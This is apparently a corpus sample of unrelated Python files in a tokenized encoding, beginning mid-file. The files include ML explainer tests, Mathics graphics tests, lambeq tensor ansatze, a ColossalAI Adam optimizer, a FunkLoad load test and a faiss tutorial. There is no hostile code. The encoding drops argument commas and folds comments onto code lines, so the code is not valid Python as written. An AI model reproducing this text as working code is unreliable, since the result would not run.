pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.pdp_df("Deck") pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.pdp_df("Age" index=0) pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.pdp_df("Gender" index=0) 
pd.DataFrame)<block_end><block_end><class_stmt>LogisticRegressionTests(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>X_train,y_train,X_test,y_test=titanic_survive()<line_sep>train_names,test_names=titanic_names()<line_sep>model=LogisticRegression()<line_sep>model.fit(X_train y_train)<line_sep>self.explainer=ClassifierExplainer(model X_test y_test shap='linear' cats=['Sex' 'Deck' 'Embarked'] labels=['Not survived' 'Survived'] idxs=test_names)<block_end><def_stmt>test_preds self<block_start>self.assertIsInstance(self.explainer.preds np.ndarray)<block_end><def_stmt>test_pred_percentiles self<block_start>self.assertIsInstance(self.explainer.pred_percentiles() np.ndarray)<block_end><def_stmt>test_columns_ranked_by_shap self<block_start>self.assertIsInstance(self.explainer.columns_ranked_by_shap() list)<block_end><def_stmt>test_permutation_importances self<block_start>self.assertIsInstance(self.explainer.get_permutation_importances_df() pd.DataFrame)<block_end><def_stmt>test_metrics self<block_start>self.assertIsInstance(self.explainer.metrics() dict)<line_sep>self.assertIsInstance(self.explainer.metrics_descriptions() dict)<block_end><def_stmt>test_mean_abs_shap_df self<block_start>self.assertIsInstance(self.explainer.get_mean_abs_shap_df() pd.DataFrame)<block_end><def_stmt>test_contrib_df self<block_start>self.assertIsInstance(self.explainer.get_contrib_df(0) pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.get_contrib_df(0 topx=3) pd.DataFrame)<block_end><def_stmt>test_shap_base_value self<block_start>self.assertIsInstance(self.explainer.shap_base_value() (np.floating float))<block_end><def_stmt>test_shap_values_shape self<block_start>self.assertTrue(self.explainer.get_shap_values_df().shape<eq>(len(self.explainer) len(self.explainer.merged_cols)))<block_end><def_stmt>test_shap_values self<block_start>self.assertIsInstance(self.explainer.get_shap_values_df() pd.DataFrame)<block_end><def_stmt>test_mean_abs_shap self<block_start>self.assertIsInstance(self.explainer.get_mean_abs_shap_df() pd.DataFrame)<block_end><def_stmt>test_calculate_properties self<block_start>self.explainer.calculate_properties(include_interactions=<false>)<block_end><def_stmt>test_pdp_df self<block_start>self.assertIsInstance(self.explainer.pdp_df("Age") pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.pdp_df("Sex") pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.pdp_df("Deck") pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.pdp_df("Age" index=0) pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.pdp_df("Sex" index=0) pd.DataFrame)<block_end><def_stmt>test_pos_label self<block_start>self.explainer.pos_label=1<line_sep>self.explainer.pos_label="Not survived"<line_sep>self.assertIsInstance(self.explainer.pos_label int)<line_sep>self.assertIsInstance(self.explainer.pos_label_str str)<line_sep>self.assertEqual(self.explainer.pos_label 0)<line_sep>self.assertEqual(self.explainer.pos_label_str "Not survived")<block_end><def_stmt>test_pred_probas self<block_start>self.assertIsInstance(self.explainer.pred_probas() np.ndarray)<block_end><def_stmt>test_metrics self<block_start>self.assertIsInstance(self.explainer.metrics() dict)<line_sep>self.assertIsInstance(self.explainer.metrics(cutoff=0.9) dict)<block_end><def_stmt>test_precision_df self<block_start>self.assertIsInstance(self.explainer.get_precision_df() pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.get_precision_df(multiclass=<true>) 
pd.DataFrame)<line_sep>self.assertIsInstance(self.explainer.get_precision_df(quantiles=4) pd.DataFrame)<block_end><def_stmt>test_lift_curve_df self<block_start>self.assertIsInstance(self.explainer.get_liftcurve_df() pd.DataFrame)<block_end><block_end><class_stmt>LogisticRegressionKernelTests(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>X_train,y_train,X_test,y_test=titanic_survive()<line_sep>train_names,test_names=titanic_names()<line_sep>model=LogisticRegression()<line_sep>model.fit(X_train y_train)<line_sep>self.explainer=ClassifierExplainer(model X_test.iloc[:20] y_test.iloc[:20] shap='kernel' model_output='probability' X_background=shap.sample(X_train 5) cats=[{'Gender':['Sex_female' 'Sex_male' 'Sex_nan']} 'Deck' 'Embarked'] labels=['Not survived' 'Survived'])<block_end><def_stmt>test_shap_values self<block_start>self.assertIsInstance(self.explainer.shap_base_value() (np.floating float))<line_sep>self.assertTrue(self.explainer.get_shap_values_df().shape<eq>(len(self.explainer) len(self.explainer.merged_cols)))<line_sep>self.assertIsInstance(self.explainer.get_shap_values_df() pd.DataFrame)<block_end><block_end><class_stmt>LinearRegressionKernelTests(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>X_train,y_train,X_test,y_test=titanic_fare()<line_sep>self.test_len=len(X_test)<line_sep>model=LinearRegression().fit(X_train y_train)<line_sep>self.explainer=RegressionExplainer(model X_test.iloc[:20] y_test.iloc[:20] shap='kernel' X_background=shap.sample(X_train 5))<block_end><def_stmt>test_shap_values self<block_start>self.assertIsInstance(self.explainer.shap_base_value() (np.floating float))<line_sep>self.assertTrue(self.explainer.get_shap_values_df().shape<eq>(len(self.explainer) len(self.explainer.merged_cols)))<line_sep>self.assertIsInstance(self.explainer.get_shap_values_df() pd.DataFrame)<block_end><block_end>
<import_stmt>re<import_from_stmt>mathics.core.expression Symbol Integer0 Integer1 Expression<import_from_stmt>mathics.core.evaluation Evaluation<import_from_stmt>mathics.session MathicsSession<import_from_stmt>mathics.builtin.inout MakeBoxes<line_sep>session=MathicsSession(add_builtin=<true> catch_interrupt=<false>)<line_sep>evaluation=Evaluation(session.definitions)<line_sep>GraphicsSymbol=Symbol("Graphics")<line_sep>ListSymbol=Symbol("List")<line_sep>asy_wrapper_pat=r"""^\s* \s*\\begin{asy} \s*usepackage\("amsmath"\); \s*size\(.+\); \s* """<def_stmt>extract_asy_body asy<block_start>matches=re.match(asy_wrapper_pat asy)<line_sep>body=asy[len(matches.group(0)):]<assert_stmt>matches<line_sep>print(body)<line_sep><return>body<block_end><def_stmt>get_asy expression<block_start>boxes=MakeBoxes(expression).evaluate(evaluation)<line_sep><return>boxes.boxes_to_tex()<block_end><def_stmt>test_asy_circle <block_start>expression=Expression(GraphicsSymbol Expression("Circle" Expression(ListSymbol Integer0 Integer0)) )<line_sep>asy=get_asy(expression)<line_sep>inner_asy=extract_asy_body(asy)<line_sep># Circles are implemented as ellipses with equal major and minor axes. # Check for that. matches=re.match(r"^draw\(ellipse\(\((.+),\s*(.+)\),(.*),(.*)\), .*" inner_asy)<assert_stmt>matches<line_sep># Check that center point is centered and # major and minor axes are the same <assert_stmt>matches.group(1)<eq>matches.group(2)<assert_stmt>matches.group(3)<eq>matches.group(4)<block_end><def_stmt>test_asy_point <block_start>expression=Expression(GraphicsSymbol Expression("Point" Expression(ListSymbol Integer0 Integer0)) )<line_sep>asy=get_asy(expression)<line_sep>inner_asy=extract_asy_body(asy)<line_sep>print(inner_asy)<line_sep># matches = re.match(r'^Circle\((.+), (.+), (.+)\),.+;', inner_asy) matches=re.match(r"// PointBox\ndot\(\((.+), (.+)\), .+\);.*" inner_asy)<assert_stmt>matches<line_sep># Since the x,y point is the same, we'll check that whatever this # coordinate mapped to, it is the same. <assert_stmt>matches.group(1)<eq>matches.group(2)<block_end><def_stmt>test_asy_arrowbox <block_start>expression=Expression(GraphicsSymbol Expression("Arrow" Expression(ListSymbol Expression(ListSymbol Integer0 Integer0) Expression(ListSymbol Integer1 Integer1) ) ) )<line_sep>asy=get_asy(expression)<line_sep>inner_asy=extract_asy_body(asy)<line_sep>matches=re.match(r"^draw\(.*\)" inner_asy)<line_sep># TODO: Match line and arrowbox <assert_stmt>matches<block_end><def_stmt>test_asy_bezier_curve <block_start>expression=Expression(GraphicsSymbol Expression("BezierCurve" Expression(ListSymbol Expression(ListSymbol Integer0 Integer0) Expression(ListSymbol Integer1 Integer1) ) ) )<line_sep>asy=get_asy(expression)<line_sep>inner_asy=extract_asy_body(asy)<line_sep>matches=re.match(r"// BezierCurveBox\nimport graph;" inner_asy)<line_sep># TODO: Match line and arrowbox <assert_stmt>matches<block_end><if_stmt>__name__<eq>"__main__"<block_start>test_asy_bezier_curve()<block_end>
<import_from_future_stmt> absolute_import<import_from_future_stmt> division<line_sep>LIBSVM=LIBLINEAR=<true><try_stmt><block_start><import_from_stmt>. libsvm<import_from_stmt>. libsvmutil<block_end><except_stmt>ImportError<as>e<block_start>LIBSVM=<false><line_sep><raise>e<block_end><try_stmt><block_start><import_from_stmt>. liblinear<import_from_stmt>. liblinearutil<block_end><except_stmt><block_start>LIBLINEAR=<false><block_end>
# Copyright 2021, 2022 Cambridge Quantum Computing Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Tensor Ansatz ============= A tensor ansatz is used to convert a DisCoCat diagram into a tensor network. """<import_from_future_stmt> annotations<line_sep>__all__=['TensorAnsatz' 'MPSAnsatz' 'SpiderAnsatz']<import_from_stmt>collections.abc Mapping<import_from_stmt>functools reduce<import_from_stmt>typing Any<import_from_stmt>discopy rigid Ty tensor Word<import_from_stmt>discopy.rigid Cup Spider<import_from_stmt>discopy.tensor Dim<import_from_stmt>lambeq.ansatz BaseAnsatz Symbol<class_stmt>TensorAnsatz(BaseAnsatz)<block_start>"""Base class for tensor network ansatz."""<def_stmt>__init__ self ob_map:Mapping[Ty Dim] **kwargs:Any<arrow><none><block_start>"""Instantiate a tensor network ansatz. Parameters ---------- ob_map : dict A mapping from :py:class:`discopy.rigid.Ty` to the dimension space it uses in a tensor network. **kwargs : dict Extra parameters for ansatz configuration. """<line_sep>self.ob_map=ob_map<line_sep>self.functor=rigid.Functor(ob=self._ob ar=self._ar ar_factory=tensor.Diagram ob_factory=tensor.Dim)<block_end><def_stmt>_ob self type_:Ty<arrow>Dim<block_start><return>Dim().tensor(*[self.ob_map[Ty(t.name)]<for>t type_])<block_end><def_stmt>_ar self box:rigid.Box<arrow>tensor.Diagram<block_start>name=self._summarise_box(box)<line_sep>dom=self._ob(box.dom)<line_sep>cod=self._ob(box.cod)<line_sep>n_params=reduce(<lambda>x y:x<times>y dom@cod 1)<line_sep>syms=Symbol(name size=n_params)<line_sep><return>tensor.Box(box.name dom cod syms)<block_end><def_stmt>__call__ self diagram:rigid.Diagram<arrow>tensor.Diagram<block_start>"""Convert a DisCoPy diagram into a DisCoPy tensor."""<line_sep><return>self.functor(diagram)<block_end><block_end><class_stmt>MPSAnsatz(TensorAnsatz)<block_start>"""Split large boxes into matrix product states."""<line_sep>BOND_TYPE:Ty=Ty('B')<def_stmt>__init__ self ob_map:Mapping[Ty Dim] bond_dim:int max_order:int=3<arrow><none><block_start>"""Instantiate a matrix product state ansatz. Parameters ---------- ob_map : dict A mapping from :py:class:`discopy.rigid.Ty` to the dimension space it uses in a tensor network. bond_dim: int The size of the bonding dimension. max_order: int The maximum order of each tensor in the matrix product state, which must be at least 3. 
"""<if_stmt>max_order<l>3<block_start><raise>ValueError('`max_order` must be at least 3')<block_end><if_stmt>self.BOND_TYPE<in>ob_map<block_start><raise>ValueError('specify bond dimension using `bond_dim`')<block_end>ob_map=dict(ob_map)<line_sep>ob_map[self.BOND_TYPE]=Dim(bond_dim)<line_sep>self.ob_map=ob_map<line_sep>self.bond_dim=bond_dim<line_sep>self.max_order=max_order<line_sep>self.split_functor=rigid.Functor(ob=<lambda>ob:ob ar=self._ar)<line_sep>self.tensor_functor=rigid.Functor(ob=self.ob_map ar=super()._ar ar_factory=tensor.Diagram ob_factory=tensor.Dim)<block_end><def_stmt>_ar self ar:Word<arrow>rigid.Diagram<block_start>bond=self.BOND_TYPE<if_stmt>len(ar.cod)<le>self.max_order<block_start><return>Word(f'{ar.name}_0' ar.cod)<block_end>boxes=[]<line_sep>cups=[]<line_sep>step_size=self.max_order-2<for_stmt>i,start enumerate(range(0 len(ar.cod) step_size))<block_start>[email protected][start:start+step_size]@bond<line_sep>boxes.append(Word(f'{ar.name}_{i}' cod))<line_sep>cups<augadd>[rigid.Id(cod[1:-1]) Cup(bond bond.r)]<block_end>boxes[0]=Word(boxes[0].name boxes[0].cod[1:])<line_sep>boxes[-1]=Word(boxes[-1].name boxes[-1].cod[:-1])<line_sep><return>rigid.Box.tensor(*boxes)<rshift>rigid.Diagram.tensor(*cups[:-1])<block_end><def_stmt>__call__ self diagram:rigid.Diagram<arrow>tensor.Diagram<block_start><return>self.tensor_functor(self.split_functor(diagram))<block_end><block_end><class_stmt>SpiderAnsatz(TensorAnsatz)<block_start>"""Split large boxes into spiders."""<def_stmt>__init__ self ob_map:Mapping[Ty Dim] max_order:int=2<arrow><none><block_start>"""Instantiate a spider ansatz. Parameters ---------- ob_map : dict A mapping from :py:class:`discopy.rigid.Ty` to the dimension space it uses in a tensor network. max_order: int The maximum order of each tensor, which must be at least 2. """<if_stmt>max_order<l>2<block_start><raise>ValueError('`max_order` must be at least 2')<block_end>self.ob_map=ob_map<line_sep>self.max_order=max_order<line_sep>self.split_functor=rigid.Functor(ob=<lambda>ob:ob ar=self._ar)<line_sep>self.tensor_functor=rigid.Functor(ob=self.ob_map ar=super()._ar ar_factory=tensor.Diagram ob_factory=tensor.Dim)<block_end><def_stmt>_ar self ar:Word<arrow>rigid.Diagram<block_start><if_stmt>len(ar.cod)<le>self.max_order<block_start><return>Word(f'{ar.name}_0' ar.cod)<block_end>boxes=[]<line_sep>spiders=[rigid.Id(ar.cod[:1])]<line_sep>step_size=self.max_order-1<for_stmt>i,start enumerate(range(0 len(ar.cod)-1 step_size))<block_start>cod=ar.cod[start:start+step_size+1]<line_sep>boxes.append(Word(f'{ar.name}_{i}' cod))<line_sep>spiders<augadd>[rigid.Id(cod[1:-1]) Spider(2 1 cod[-1:])]<block_end>spiders[-1]=rigid.Id(spiders[-1].cod)<line_sep><return>rigid.Diagram.tensor(*boxes)<rshift>rigid.Diagram.tensor(*spiders)<block_end><def_stmt>__call__ self diagram:rigid.Diagram<arrow>tensor.Diagram<block_start><return>self.tensor_functor(self.split_functor(diagram))<block_end><block_end>
<import_stmt>torch<import_stmt>torch.nn<as>nn<import_from_stmt>glasses.utils.Tracker Tracker<def_stmt>test_tracker <block_start>x=torch.rand(64 1)<line_sep>model=nn.Sequential(nn.Linear(1 64) nn.ReLU() nn.Linear(64 10) nn.ReLU())<line_sep>tr=Tracker(model)<line_sep>tr(x)<assert_stmt>len(tr.traced)<eq>4<assert_stmt>len(tr.parametrized)<eq>2<block_end>
<import_stmt>numpy<as>np<line_sep># from IPython import embed;embed() <import_from_stmt>make_densebox_target make_densebox_target<as>make_densebox_target_old<import_from_stmt>make_densebox_target_dev make_densebox_target<as>make_densebox_target_new<line_sep>gt_boxes=np.asarray([[150 250 130 60 1]])<line_sep>config_dict=dict(x_size=303 score_size=17 total_stride=8 score_offset=(303-1-(17-1)<times>8)<floordiv>2 )<line_sep>target_old=make_densebox_target_old(gt_boxes config_dict)<line_sep>target_new=make_densebox_target_new(gt_boxes config_dict)<for_stmt>v_old,v_new zip(target_old target_new)<block_start>v_new=v_new.numpy()<line_sep># uncomment the next line to inspect tensors in detail # from IPython import embed;embed() np.testing.assert_allclose(v_new v_old atol=1e-6 verbose=<true>)<line_sep>print("Values closed.")<block_end>
<import_from_stmt>sklearn.base RegressorMixin BaseEstimator is_regressor<class_stmt>DistilledRegressor(BaseEstimator RegressorMixin)<block_start>""" Class to implement distillation. Currently only supports regression. Params ------ teacher: initial model to be trained must be a regressor or a binary classifier student: model to be distilled from teacher's predictions must be a regressor """<def_stmt>__init__ self teacher:BaseEstimator student:BaseEstimator n_iters_teacher:int=1<block_start>self.teacher=teacher<line_sep>self.student=student<line_sep>self.n_iters_teacher=n_iters_teacher<line_sep>self._validate_student()<line_sep>self._check_teacher_type()<block_end><def_stmt>_validate_student self<block_start><if_stmt>is_regressor(self.student)<block_start><pass><block_end><else_stmt><block_start><if_stmt><not>hasattr(self.student "prediction_task")<block_start><raise>ValueError("Student must be either a scikit-learn or imodels regressor")<block_end><elif_stmt>self.student.prediction_task<eq>"classification"<block_start><raise>ValueError("Student must be a regressor")<block_end><block_end><block_end><def_stmt>_check_teacher_type self<block_start><if_stmt>hasattr(self.teacher "prediction_task")<block_start>self.teacher_type=self.teacher.prediction_task<block_end><elif_stmt>hasattr(self.teacher "_estimator_type")<block_start><if_stmt>is_regressor(self.teacher)<block_start>self.teacher_type="regression"<block_end><else_stmt><block_start>self.teacher_type="classification"<block_end><block_end><block_end><def_stmt>set_teacher_params self **params<block_start>self.teacher.set_params(**params)<block_end><def_stmt>set_student_params self **params<block_start>self.student.set_params(**params)<block_end><def_stmt>fit self X y **kwargs# fit teacher <block_start><for_stmt>iter_teacher range(self.n_iters_teacher)<block_start>self.teacher.fit(X y **kwargs)<if_stmt>self.teacher_type<eq>"regression"<block_start>y=self.teacher.predict(X)<block_end><else_stmt><block_start>y=self.teacher.predict_proba(X)[: 1]<block_end><block_end># assumes binary classifier # fit student self.student.fit(X y)<block_end><def_stmt>predict self X<block_start><return>self.student.predict(X)<block_end><block_end>
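# --- Usage sketch (illustrative; dataset and model choices are arbitrary) ---
# Distil a gradient-boosting teacher into a small, interpretable tree student.
from sklearn.datasets import make_regression
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.tree import DecisionTreeRegressor

X, y = make_regression(n_samples=200, n_features=5, random_state=0)
model = DistilledRegressor(teacher=GradientBoostingRegressor(random_state=0),
                           student=DecisionTreeRegressor(max_depth=3),
                           n_iters_teacher=1)
model.fit(X, y)            # teacher fits on y, student fits on the teacher's predictions
preds = model.predict(X)   # predictions come from the distilled student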
<import_from_stmt>.into into<def_stmt>odo source target **kwargs<block_start>""" Push one dataset into another Parameters ---------- source: object or string The source of your data. Either an object (e.g. DataFrame), or a string ('filename.csv') target: object or string or type The target for where you want your data to go. Either an object, (e.g. []), a type, (e.g. list) or a string (e.g. 'postgresql://hostname::tablename') raise_on_errors: bool (optional, defaults to False) Raise exceptions rather than reroute around them **kwargs: keyword arguments to pass through to conversion functions. Optional Keyword Arguments -------------------------- Odo passes keyword arguments (like ``sep=';'``) down to the functions that it uses to perform conversions (like ``pandas.read_csv``). Due to the quantity of possible optional keyword arguments we cannot list them here. See the following documentation for your format * AWS - http://odo.pydata.org/en/latest/aws.html * CSV - http://odo.pydata.org/en/latest/csv.html * JSON - http://odo.pydata.org/en/latest/json.html * HDF5 - http://odo.pydata.org/en/latest/hdf5.html * HDFS - http://odo.pydata.org/en/latest/hdfs.html * Hive - http://odo.pydata.org/en/latest/hive.html * SAS - http://odo.pydata.org/en/latest/sas.html * SQL - http://odo.pydata.org/en/latest/sql.html * SSH - http://odo.pydata.org/en/latest/ssh.html * Mongo - http://odo.pydata.org/en/latest/mongo.html * Spark - http://odo.pydata.org/en/latest/spark.html Examples -------- >>> L = odo((1, 2, 3), list) # Convert things into new things >>> L [1, 2, 3] >>> _ = odo((4, 5, 6), L) # Append things onto existing things >>> L [1, 2, 3, 4, 5, 6] >>> odo([('Alice', 1), ('Bob', 2)], 'myfile.csv') # doctest: +SKIP Explanation ----------- We can specify data with a Python object like a ``list``, ``DataFrame``, ``sqlalchemy.Table``, ``h5py.Dataset``, etc. We can specify data with a string URI like ``'myfile.csv'``, ``'myfiles.*.json'`` or ``'sqlite:///data.db::tablename'``. These are matched by regular expression. See the ``resource`` function for more details on string URIs. We can optionally specify datatypes with the ``dshape=`` keyword, providing a datashape. This allows us to be explicit about types when mismatches occur or when our data doesn't hold the whole picture. See the ``discover`` function for more information on ``dshape``. >>> ds = 'var * {name: string, balance: float64}' >>> odo([('Alice', 100), ('Bob', 200)], 'accounts.json', dshape=ds) # doctest: +SKIP We can optionally specify keyword arguments to pass down to relevant conversion functions. For example, when converting a CSV file we might want to specify the delimiter >>> odo('accounts.csv', list, has_header=True, delimiter=';') # doctest: +SKIP These keyword arguments trickle down to whatever function ``into`` uses to convert this particular format, functions like ``pandas.read_csv``. See Also -------- odo.resource.resource - Specify things with strings datashape.discover - Get datashape of data odo.convert.convert - Convert things into new things odo.append.append - Add things onto existing things """<line_sep><return>into(target source **kwargs)<block_end>
<import_stmt>unittest<import_from_stmt>random random<import_from_stmt>funkload.FunkLoadTestCase FunkLoadTestCase<import_from_stmt>webunit.utility Upload<import_from_stmt>funkload.utils Data<class_stmt>Stress_Test(FunkLoadTestCase)<block_start><def_stmt>setUp self<block_start>self.server_url=self.conf_get('main' 'url')<line_sep>self.setBasicAuth('<EMAIL>' 'testing!')<line_sep><pass><block_end><def_stmt>test_simple self# The description should be set in the configuration file <block_start>server_url=self.server_url<line_sep># begin test --------------------------------------------- nb_time=self.conf_getInt('test_simple' 'nb_time')<line_sep>ap_list=self.conf_get('test_simple' 'ap_list').split(",")<line_sep>#print "aplist,", ap_list <for_stmt>i range(nb_time)<block_start><for_stmt>ap ap_list<block_start>self.get('https://'+server_url+ap description='Get URL')<block_end><block_end># end test ------------ <block_end><block_end>
<import_stmt>textwrap<import_stmt>unittest<import_from_stmt>conans.test.assets.genconanfile GenConanfile<import_from_stmt>conans.test.utils.tools TestClient<class_stmt>DepsCppInfoTest(unittest.TestCase)<block_start><def_stmt>test self# https://github.com/conan-io/conan/issues/7598 <block_start>client=TestClient()<line_sep>client.save({"conanfile.py":GenConanfile()})<line_sep>client.run("create . dep/0.1@user/testing")<line_sep>conanfile=textwrap.dedent(""" from conans import ConanFile class Pkg(ConanFile): requires = "dep/0.1@user/testing" def build(self): self.output.info("DEPS_CPP_INFO_BIN: %s" % self.deps_cpp_info["dep"].bin_paths) """)<line_sep>client.save({"conanfile.py":conanfile})<line_sep>client.run("create . pkg/0.1@user/testing")<line_sep>self.assertIn("pkg/0.1@user/testing: DEPS_CPP_INFO_BIN: []" client.out)<line_sep>client.run("install .")<line_sep>client.run("build .")<line_sep>self.assertIn("conanfile.py: DEPS_CPP_INFO_BIN: []" client.out)<block_end><block_end>
<import_stmt>torch<import_from_stmt>colossalai.utils multi_tensor_applier<import_from_stmt>colossalai.registry OPTIMIZERS<import_from_stmt>colossalai.nn.optimizer CPU_ADAM_CNT<line_sep>@OPTIMIZERS.register_module<class_stmt>HybridAdam(torch.optim.Optimizer)<block_start>"""Implements Adam algorithm. Supports parameter updates on both GPU and CPU, depending on the device of the parameters. The parameters and gradients should be on the same device: * Parameters on CPU and gradients on CPU is allowed. * Parameters on GPU and gradients on GPU is allowed. * Parameters on GPU and gradients on CPU is **not** allowed. Requires ColossalAI to be installed via ``pip install .`` This version of Hybrid Adam is a hybrid of CPUAdam and FusedAdam. * For parameters updating on CPU, it uses CPUAdam. * For parameters updating on GPU, it uses FusedAdam. * Hybrid precision calculation of fp16 and fp32 is supported, e.g. fp32 parameters and fp16 gradients. :class:`colossalai.nn.optimizer.HybridAdam` may be used as a drop-in replacement for ``torch.optim.AdamW``, or ``torch.optim.Adam`` with ``adamw_mode=False`` Adam was proposed in `Adam: A Method for Stochastic Optimization`_. Arguments: model_params (iterable): iterable of parameters or dicts defining parameter groups. lr (float, optional): learning rate. (default: 1e-3) betas (Tuple[float, float], optional): coefficients used for computing running averages of gradient and its square. (default: (0.9, 0.999)) eps (float, optional): term added to the denominator to improve numerical stability. (default: 1e-8) weight_decay (float, optional): weight decay (L2 penalty) (default: 0) amsgrad (boolean, optional): whether to use the AMSGrad variant of this algorithm from the paper `On the Convergence of Adam and Beyond`_ (default: False) NOT SUPPORTED yet in CPUAdam! adamw_mode (boolean, optional): apply L2 regularization or weight decay. True for decoupled weight decay (also known as AdamW) (default: True) simd_log (boolean, optional): whether to show if you are using SIMD to accelerate. (default: False) .. _Adam\: A Method for Stochastic Optimization: https://arxiv.org/abs/1412.6980 .. 
_On the Convergence of Adam and Beyond: https://openreview.net/forum?id=ryQu7f-RZ """<line_sep># Number of fp32 shards for per parameter # Param weight, grad, momentum and variance num_fp32_shards_per_param=4<def_stmt>__init__ self model_params lr=1e-3 bias_correction=<true> betas=(0.9 0.999) eps=1e-8 weight_decay=0 adamw_mode=<true> simd_log=<false><block_start>default_args=dict(lr=lr betas=betas eps=eps weight_decay=weight_decay bias_correction=bias_correction)<line_sep>super(HybridAdam self).__init__(model_params default_args)<line_sep>self.opt_id=CPU_ADAM_CNT()<line_sep>self.adamw_mode=adamw_mode<try_stmt><block_start><import_stmt>cpu_adam<import_stmt>colossal_C<block_end><except_stmt>ImportError<block_start><raise>ImportError('Please install colossalai from source code to use HybridAdam')<block_end>self.cpu_adam_op=cpu_adam<line_sep>self.cpu_adam_op.create_adam(self.opt_id lr betas[0] betas[1] eps weight_decay adamw_mode simd_log)<line_sep>self.gpu_adam_op=colossal_C.multi_tensor_adam<line_sep>self._dummy_overflow_buf=torch.cuda.IntTensor([0])<block_end><def_stmt>__del__ self<block_start><if_stmt>self.cpu_adam_op<block_start>self.cpu_adam_op.destroy_adam(self.opt_id)<block_end><block_end>@torch.no_grad()<def_stmt>step self closure=<none><block_start>loss=<none><if_stmt>closure<is><not><none><block_start><with_stmt>torch.enable_grad()<block_start>loss=closure()<block_end><block_end><for_stmt>_,group enumerate(self.param_groups)<block_start>g_l,p_l,m_l,v_l=[] [] [] []<line_sep>group_step=0<for_stmt>_,p enumerate(group['params'])<block_start><if_stmt>p.grad<is><none><block_start><continue><block_end>state=self.state[p]<line_sep>target_device=p.device<if_stmt>len(state)<eq>0<block_start>state['step']=0<line_sep># gradient momentums state['exp_avg']=torch.zeros_like(p.data dtype=torch.float device=target_device)<line_sep># gradient variances state['exp_avg_sq']=torch.zeros_like(p.data dtype=torch.float device=target_device)<block_end>state['step']<augadd>1<line_sep>group_step=state['step']<line_sep>beta1,beta2=group['betas']<if_stmt>target_device.type<eq>'cpu'<block_start><assert_stmt>state['exp_avg'].device.type<eq>'cpu' "exp_avg should stay on cpu"<assert_stmt>state['exp_avg_sq'].device.type<eq>'cpu' "exp_avg should stay on cpu"<line_sep>self.cpu_adam_op.adam_update(self.opt_id state['step'] group['lr'] beta1 beta2 group['eps'] group['weight_decay'] group['bias_correction'] p.data p.grad.data state['exp_avg'] state['exp_avg_sq'] -1)<block_end><elif_stmt>target_device.type<eq>'cuda'<block_start><assert_stmt>state['exp_avg'].device.type<eq>'cuda' "exp_avg should stay on cuda"<assert_stmt>state['exp_avg_sq'].device.type<eq>'cuda' "exp_avg should stay on cuda"<line_sep># record the state by gruop and update at once g_l.append(p.grad.data)<line_sep>p_l.append(p.data)<line_sep>m_l.append(state['exp_avg'])<line_sep>v_l.append(state['exp_avg_sq'])<block_end><else_stmt><block_start><raise>RuntimeError<block_end><block_end><if_stmt>len(g_l)<g>0<block_start>adamw_mode=1<if>self.adamw_mode<else>0<line_sep>bias_correction=1<if>group['bias_correction']<else>0<line_sep>multi_tensor_applier(self.gpu_adam_op self._dummy_overflow_buf [g_l p_l m_l v_l] group['lr'] group['betas'][0] group['betas'][1] group['eps'] group_step adamw_mode bias_correction group['weight_decay'])<block_end><block_end><return>loss<block_end><block_end>
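# --- Usage sketch (assumes ColossalAI built from source so the cpu_adam and
# colossal_C extensions import; the model and data below are placeholders) ---
import torch
import torch.nn as nn

model = nn.Linear(16, 4).cuda()
optimizer = HybridAdam(model.parameters(), lr=1e-3, weight_decay=0.0)

data = torch.randn(8, 16, device='cuda')
target = torch.randn(8, 4, device='cuda')

optimizer.zero_grad()
loss = nn.functional.mse_loss(model(data), target)
loss.backward()
optimizer.step()  # CUDA params take the fused multi-tensor path; CPU params would use cpu_adam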
<import_from_future_stmt> absolute_import division print_function<import_from_stmt>libtbx adopt_init_args<import_stmt>sys<class_stmt>flags(object)<block_start><def_stmt>__init__ self adp_similarity=<none> rigid_bond=<none> isotropic_adp=<none> default=<false><block_start><if_stmt>(adp_similarity<is><none>)<block_start>adp_similarity=default<block_end><if_stmt>(rigid_bond<is><none>)<block_start>rigid_bond=default<block_end><if_stmt>(isotropic_adp<is><none>)<block_start>isotropic_adp=default<block_end>adopt_init_args(self locals())<block_end><def_stmt>show self f=<none><block_start><if_stmt>(f<is><none>)<block_start>f=sys.stdout<block_end>print("adp_restraints.manager.flags:" file=f)<line_sep>print(" adp_similarity:" self.adp_similarity file=f)<line_sep>print(" rigid_bond:" self.rigid_bond file=f)<line_sep>print(" isotropic_adp:" self.isotropic_adp file=f)<block_end><block_end>
# Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. <import_stmt>numpy<as>np<line_sep>d=64# dimension nb=100000# database size nq=10000# nb of queries np.random.seed(1234)# make reproducible xb=np.random.random((nb d)).astype('float32')<line_sep>xb[: 0]<augadd>np.arange(nb)/1000.<line_sep>xq=np.random.random((nq d)).astype('float32')<line_sep>xq[: 0]<augadd>np.arange(nq)/1000.<import_stmt>faiss# make faiss available index=faiss.IndexFlatL2(d)# build the index print(index.is_trained)<line_sep>index.add(xb)# add vectors to the index print(index.ntotal)<line_sep>k=4# we want to see 4 nearest neighbors D,I=index.search(xb[:5] k)# sanity check print(I)<line_sep>print(D)<line_sep>D,I=index.search(xq k)# actual search print(I[:5])# neighbors of the 5 first queries print(I[-5:])# neighbors of the 5 last queries
